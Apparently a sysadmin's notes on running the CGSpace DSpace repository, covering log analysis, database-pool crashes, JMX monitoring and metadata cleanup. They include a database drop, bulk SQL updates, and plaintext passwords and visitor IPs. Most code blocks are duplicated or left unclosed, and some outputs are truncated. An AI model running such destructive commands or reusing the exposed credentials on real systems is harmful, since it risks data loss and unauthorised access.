<pre tabindex="0"><code>$ docker exec dspace_db dropdb -U postgres dspace
$ docker exec dspace_db createdb -U postgres -O dspace --encoding=UNICODE dspace
$ docker exec dspace_db psql -U postgres dspace -c &#39;alter user dspace createuser;&#39;
$ docker cp test.dump dspace_db:/tmp/test.dump
$ docker exec dspace_db pg_restore -U postgres -d dspace /tmp/test.dump
$ docker exec dspace_db psql -U postgres dspace -c &#39;alter user dspace nocreateuser;&#39;
$ docker exec dspace_db vacuumdb -U postgres dspace
$ docker cp ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace_db:/tmp
$ docker exec dspace_db psql -U dspace -f /tmp/update-sequences.sql dspace
</code></pre><ul>
<li>Thinking about generating a jmeter test plan for DSpace, along the lines of <a href="https://github.com/Georgetown-University-Libraries/dspace-performance-test">Georgetown&rsquo;s dspace-performance-test</a></li>
<li>I got a list of all the GET requests on CGSpace for January 21st (the last time Linode complained the load was high), excluding admin calls:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -c -v &quot;/admin&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -c -v &#34;/admin&#34;
56405
</code></pre><ul>
<li>Apparently about 28% of these requests were for bitstreams, 30% for the REST API, and 30% for handles:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -v &quot;/admin&quot; | awk '{print $7}' | grep -Eo &quot;^/(handle|bitstream|rest|oai)/&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -Eo &#34;^/(handle|bitstream|rest|oai)/&#34; | sort | uniq -c | sort -n
38 /oai/
14406 /bitstream/
15179 /rest/
</code></pre><ul>
<li>And 3% were to the homepage or search:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -v &quot;/admin&quot; | awk '{print $7}' | grep -Eo '^/($|open-search|discover)' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -Eo &#39;^/($|open-search|discover)&#39; | sort | uniq -c
1050 /
413 /discover
170 /open-search
</code></pre><ul>
<li>The last 10% or so seem to be for static assets that would be served by nginx anyways:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -v &quot;/admin&quot; | awk '{print $7}' | grep -v bitstream | grep -Eo '\.(js|css|png|jpg|jpeg|php|svg|gif|txt|map)$' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -v bitstream | grep -Eo &#39;\.(js|css|png|jpg|jpeg|php|svg|gif|txt|map)$&#39; | sort | uniq -c | sort -n
2 .gif
7 .css
84 .js
</code></pre>
<ul>
<li>Looking at the REST requests, most of them are to expand all or metadata, but 5% are for retrieving bitstreams:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/library-access.log.4.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/rest.log.4.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/oai.log.4.gz /var/log/nginx/error.log.3.gz /var/log/nginx/error.log.4.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -v &quot;/admin&quot; | awk '{print $7}' | grep -E &quot;^/rest&quot; | grep -Eo &quot;(retrieve|expand=[a-z].*)&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/library-access.log.4.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/rest.log.4.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/oai.log.4.gz /var/log/nginx/error.log.3.gz /var/log/nginx/error.log.4.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -E &#34;^/rest&#34; | grep -Eo &#34;(retrieve|expand=[a-z].*)&#34; | sort | uniq -c | sort -n
1 expand=collections
16 expand=all&amp;limit=1
45 expand=items
</code></pre><ul>
<li>Looking at the DSpace logs I see this error happened just before UptimeRobot noticed it going down:</li>
</ul>
<pre tabindex="0"><code>2018-01-29 05:30:22,226 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=3775D4125D28EF0C691B08345D905141:ip_addr=68.180.229.254:view_item:handle=10568/71890
2018-01-29 05:30:22,322 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractSearch @ org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1994+TO+1999]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
Was expecting one of:
&#34;TO&#34; ...
&lt;RANGE_QUOTED&gt; ...
&lt;RANGE_GOOP&gt; ...
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1994+TO+1999]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
Was expecting one of:
&#34;TO&#34; ...
&lt;RANGE_QUOTED&gt; ...
&lt;RANGE_GOOP&gt; ...
</code></pre><ul>
<li>I see a few dozen HTTP 499 errors in the nginx access log for a few minutes before this happened, but HTTP 499 is just when nginx says that the client closed the request early</li>
<li>Perhaps this from the nginx error log is relevant?</li>
</ul>
<pre tabindex="0"><code>2018/01/29 05:26:34 [warn] 26895#26895: *944759 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000026166 while reading upstream, client: 180.76.15.34, server: cgspace.cgiar.org, request: &quot;GET /bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12 HTTP/1.1&quot;, upstream: &quot;http://127.0.0.1:8443/bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12&quot;, host: &quot;cgspace.cgiar.org&quot;
<pre tabindex="0"><code>2018/01/29 05:26:34 [warn] 26895#26895: *944759 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000026166 while reading upstream, client: 180.76.15.34, server: cgspace.cgiar.org, request: &#34;GET /bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12 HTTP/1.1&#34;, upstream: &#34;http://127.0.0.1:8443/bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12&#34;, host: &#34;cgspace.cgiar.org&#34;
</code></pre><ul>
<li>I think that must be unrelated, probably the client closed the request to nginx because DSpace (Tomcat) was taking too long</li>
<li>An interesting <a href="https://gist.github.com/magnetikonline/11312172">snippet to get the maximum and average nginx responses</a>:</li>
</ul>
<pre tabindex="0"><code># awk '($9 ~ /200/) { i++;sum+=$10;max=$10&gt;max?$10:max; } END { printf(&quot;Maximum: %d\nAverage: %d\n&quot;,max,i?sum/i:0); }' /var/log/nginx/access.log
<pre tabindex="0"><code># awk &#39;($9 ~ /200/) { i++;sum+=$10;max=$10&gt;max?$10:max; } END { printf(&#34;Maximum: %d\nAverage: %d\n&#34;,max,i?sum/i:0); }&#39; /var/log/nginx/access.log
Maximum: 2771268
Average: 210483
</code></pre><ul>
<li>My best guess is that the Solr search error is related somehow but I can&rsquo;t figure it out</li>
<li>We definitely have enough database connections, as I haven&rsquo;t seen a pool error in weeks:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-2*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-2*
dspace.log.2018-01-20:0
dspace.log.2018-01-21:0
dspace.log.2018-01-22:0
dspace.log.2018-01-29:0
</code></pre>
<pre tabindex="0"><code>[tomcat_*]
env.host 127.0.0.1
env.port 8081
env.connector &#34;http-bio-127.0.0.1-8443&#34;
env.user munin
env.password munin
</code></pre><ul>
<li>Although following the logic of <em>/usr/share/munin/plugins/jmx_tomcat_dbpools</em> could be useful for getting the active Tomcat sessions</li>
<li>From debugging the <code>jmx_tomcat_db_pools</code> script from the <code>munin-plugins-java</code> package, I see that this is how you call arbitrary mbeans:</li>
</ul>
<pre tabindex="0"><code># port=5400 ip=&quot;127.0.0.1&quot; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=DataSource,class=javax.sql.DataSource,name=* maxActive
Catalina:type=DataSource,class=javax.sql.DataSource,name=&quot;jdbc/dspace&quot; maxActive 300
<pre tabindex="0"><code># port=5400 ip=&#34;127.0.0.1&#34; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=DataSource,class=javax.sql.DataSource,name=* maxActive
Catalina:type=DataSource,class=javax.sql.DataSource,name=&#34;jdbc/dspace&#34; maxActive 300
</code></pre><ul>
<li>More notes here: <a href="https://github.com/munin-monitoring/contrib/tree/master/plugins/jmx">https://github.com/munin-monitoring/contrib/tree/master/plugins/jmx</a></li>
<li>Looking at the Munin graphs, I that the load is 200% every morning from 03:00 to almost 08:00</li>
</ul>
<ul>
<li>There are millions of these status lines, for example in just this one log file:</li>
</ul>
<pre tabindex="0"><code># zgrep -c &quot;time remaining&quot; /var/log/tomcat7/catalina.out.1.gz
<pre tabindex="0"><code># zgrep -c &#34;time remaining&#34; /var/log/tomcat7/catalina.out.1.gz
1084741
</code></pre><ul>
<li>I filed a ticket with Atmire: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=566">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=566</a></li>
<li>For now I will restart Tomcat to clear this shit and bring the site back up</li>
<li>The top IPs from this morning, during 7 and 8AM in XMLUI and REST/OAI:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &quot;31/Jan/2018:(07|08)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;31/Jan/2018:(07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
67 66.249.66.70
70 207.46.13.12
71 197.210.168.174
198 66.249.66.90
219 41.204.190.40
255 2405:204:a208:1e12:132:2a8e:ad28:46c0
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;31/Jan/2018:(07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
2 65.55.210.187
2 66.249.66.90
3 157.55.39.79
</code></pre><ul>
<li>I should make separate database pools for the web applications and the API applications like REST and OAI</li>
<li>Ok, so this is interesting: I figured out how to get the MBean path to query Tomcat&rsquo;s activeSessions from JMX (using <code>munin-plugins-java</code>):</li>
</ul>
<pre tabindex="0"><code># port=5400 ip=&quot;127.0.0.1&quot; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=Manager,context=/,host=localhost activeSessions
<pre tabindex="0"><code># port=5400 ip=&#34;127.0.0.1&#34; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=Manager,context=/,host=localhost activeSessions
Catalina:type=Manager,context=/,host=localhost activeSessions 8
</code></pre><ul>
<li>If you connect to Tomcat in <code>jvisualvm</code> it&rsquo;s pretty obvious when you hover over the elements</li>

</ul>
<ul>
<li>Yesterday I figured out how to monitor DSpace sessions using JMX</li>
<li>I copied the logic in the jmx_tomcat_dbpools plugin provided by Ubuntu&rsquo;s munin-plugins-java package and used the stuff I discovered about JMX in 2018-01</li>
<li>I finally took a look at the second round of cleanups Peter had sent me for author affiliations in mid January</li>
<li>After trimming whitespace and quickly scanning for encoding errors I applied them on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-02-03-Affiliations-12-deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
$ ./fix-metadata-values.py -i /tmp/2018-02-03-Affiliations-1116-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-02-03-Affiliations-12-deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./fix-metadata-values.py -i /tmp/2018-02-03-Affiliations-1116-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Then I started a full Discovery reindex:</li>
</ul>
<pre tabindex="0"><code>sys 2m29.088s
</code></pre><ul>
<li>Generate a new list of affiliations for Peter to sort through:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
COPY 3723
</code></pre><ul>
<li>Oh, and it looks like we processed over 3.1 million requests in January, up from 2.9 million in <a href="/cgspace-notes/2017-12/">December</a>:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2018&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2018&#34;
3126109
real 0m23.839s
sys 0m1.905s
</code></pre>
<ul>
<li>Toying with correcting authors with trailing spaces via PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, '\s+$' , '') where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*?\s+$';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, &#39;\s+$&#39; , &#39;&#39;) where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^.*?\s+$&#39;;
UPDATE 20
</code></pre><ul>
<li>I tried the <code>TRIM(TRAILING from text_value)</code> function and it said it changed 20 items but the spaces didn&rsquo;t go away</li>
<li>This is on a fresh import of the CGSpace database, but when I tried to apply it on CGSpace there were no changes detected. Weird.</li>
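<li>For reference, the statement I tried was along these lines (a sketch, not the exact query):</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=TRIM(TRAILING from text_value) where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;\s+$&#39;;
</code></pre><ul>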
<li>Anyways, Peter wants a new list of authors to clean up, so I exported another CSV:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
COPY 55630
</code></pre><h2 id="2018-02-06">2018-02-06</h2>
<pre tabindex="0"><code># date
Tue Feb 6 09:30:32 UTC 2018
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;6/Feb/2018:(08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
2 223.185.41.40
2 66.249.64.14
2 77.246.52.40
6 154.68.16.34
7 207.46.13.66
1548 50.116.102.77
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;6/Feb/2018:(08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
77 213.55.99.121
86 66.249.64.14
101 104.196.152.243
</code></pre><ul>
<li>CGSpace crashed again, this time around <code>Wed Feb 7 11:20:28 UTC 2018</code></li>
<li>I took a few snapshots of the PostgreSQL activity at the time and as the minutes went on and the connections were very high at first but reduced on their own:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' &gt; /tmp/pg_stat_activity.txt
$ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; &gt; /tmp/pg_stat_activity.txt
$ grep -c &#39;PostgreSQL JDBC&#39; /tmp/pg_stat_activity*
/tmp/pg_stat_activity1.txt:300
/tmp/pg_stat_activity2.txt:272
/tmp/pg_stat_activity3.txt:168
</code></pre><ul>
<li>Interestingly, all of those 751 connections were idle!</li>
</ul>
<pre tabindex="0"><code>$ grep &quot;PostgreSQL JDBC&quot; /tmp/pg_stat_activity* | grep -c idle
<pre tabindex="0"><code>$ grep &#34;PostgreSQL JDBC&#34; /tmp/pg_stat_activity* | grep -c idle
751
</code></pre><ul>
<li>Since I was restarting Tomcat anyways, I decided to deploy the changes to create two different pools for web and API apps</li>
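<li>A rough sketch of that scheme, assuming two <code>Resource</code> definitions with distinct <code>ApplicationName</code> parameters so they show up separately in <code>pg_stat_activity</code> (the dspaceApi pool size here is illustrative):</li>
</ul>
<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspaceWeb&#34; type=&#34;javax.sql.DataSource&#34; auth=&#34;Container&#34;
          url=&#34;jdbc:postgresql://localhost:5432/dspace?ApplicationName=dspaceWeb&#34;
          maxActive=&#34;250&#34;/&gt;
&lt;Resource name=&#34;jdbc/dspaceApi&#34; type=&#34;javax.sql.DataSource&#34; auth=&#34;Container&#34;
          url=&#34;jdbc:postgresql://localhost:5432/dspace?ApplicationName=dspaceApi&#34;
          maxActive=&#34;50&#34;/&gt;
</code></pre>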
<ul>
<li>Indeed it seems like there were over 1800 sessions today around the hours of 10 and 11 AM:</li>
</ul>
<pre tabindex="0"><code>$ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep -E &#39;^2018-02-07 (10|11)&#39; dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1828
</code></pre><ul>
<li>CGSpace went down again a few hours later, and now the connections to the dspaceWeb pool are maxed at 250 (the new limit I imposed with the new separate pool scheme)</li>
</ul>
<ul>
<li>&hellip; but in PostgreSQL I see them <code>idle</code> or <code>idle in transaction</code>:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -c dspaceWeb
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -c dspaceWeb
250
$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c idle
250
$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c &#34;idle in transaction&#34;
187
</code></pre><ul>
<li>What the fuck, does DSpace think all connections are busy?</li>
<li>Also, WTF, there was a heap space error randomly in catalina.out:</li>
</ul>
<pre tabindex="0"><code>Wed Feb 07 15:01:54 UTC 2018 | Query:containerItem:91917 AND type:2
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-58&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>I&rsquo;m trying to find a way to determine what was using all those Tomcat sessions, but parsing the DSpace log is hard because some IPs are IPv6, which contain colons!</li>
<li>Looking at the first crash this morning around 11, I see these IPv4 addresses making requests around 10 and 11AM:</li>
</ul>
<pre tabindex="0"><code>$ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -n | uniq -c | sort -n | tail -n 20
<pre tabindex="0"><code>$ grep -E &#39;^2018-02-07 (10|11)&#39; dspace.log.2018-02-07 | grep -o -E &#39;ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}&#39; | sort -n | uniq -c | sort -n | tail -n 20
34 ip_addr=46.229.168.67
34 ip_addr=46.229.168.73
37 ip_addr=46.229.168.76
</code></pre><ul>
<li>These IPs made thousands of sessions today:</li>
</ul>
<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
530
$ grep 207.46.13.71 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
859
$ grep 40.77.167.62 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
610
$ grep 54.83.138.123 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
8
$ grep 207.46.13.135 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
826
$ grep 68.180.228.157 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
727
$ grep 40.77.167.36 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
181
$ grep 130.82.1.40 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
24
$ grep 207.46.13.54 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
166
$ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
992
</code></pre><ul>
<li>Let&rsquo;s investigate who these IPs belong to</li>
<li>Helix84 recommends restarting PostgreSQL instead of Tomcat because it restarts quicker</li>
<li>This is how the connections looked when it crashed this afternoon:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
290 dspaceWeb
</code></pre><ul>
<li>This is how it is right now:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
5 dspaceWeb
</code></pre><ul>
<li>Switch authority.controlled off and change authorLookup to lookup, and the ORCID badge doesn&rsquo;t show up on the item</li>
<li>Leave all settings but change choices.presentation to lookup and ORCID badge is there and item submission uses LC Name Authority and it breaks with this error:</li>
</ul>
<pre tabindex="0"><code>Field dc_contributor_author has choice presentation of type &quot;select&quot;, it may NOT be authority-controlled.
<pre tabindex="0"><code>Field dc_contributor_author has choice presentation of type &#34;select&#34;, it may NOT be authority-controlled.
</code></pre><ul>
<li>If I change choices.presentation to suggest it gives another error</li>
</ul>
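<ul>
<li>For reference, a sketch of the configuration properties being toggled in these experiments (assuming the stock Solr authority plugin; the values shown are illustrative):</li>
</ul>
<pre tabindex="0"><code>authority.controlled.dc.contributor.author = true
choices.plugin.dc.contributor.author = SolrAuthorAuthority
choices.presentation.dc.contributor.author = lookup
</code></pre>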
<ul>
<li>I updated my <code>fix-metadata-values.py</code> and <code>delete-metadata-values.py</code> scripts on the scripts page: <a href="https://github.com/ilri/DSpace/wiki/Scripts">https://github.com/ilri/DSpace/wiki/Scripts</a></li>
<li>I ran the 342 author corrections (after trimming whitespace and excluding those with <code>||</code> and other syntax errors) on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Then I ran a full Discovery re-indexing:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>That reminds me that Bizu had asked me to fix some of Alan Duncan&rsquo;s names in December</li>
<li>I see he actually has some variations with &ldquo;Duncan, Alan J.&rdquo;: <a href="https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=">https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=</a></li>
<li>I will just update those for her too and then restart the indexing:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Duncan, Alan%&#39;;
text_value | authority | confidence
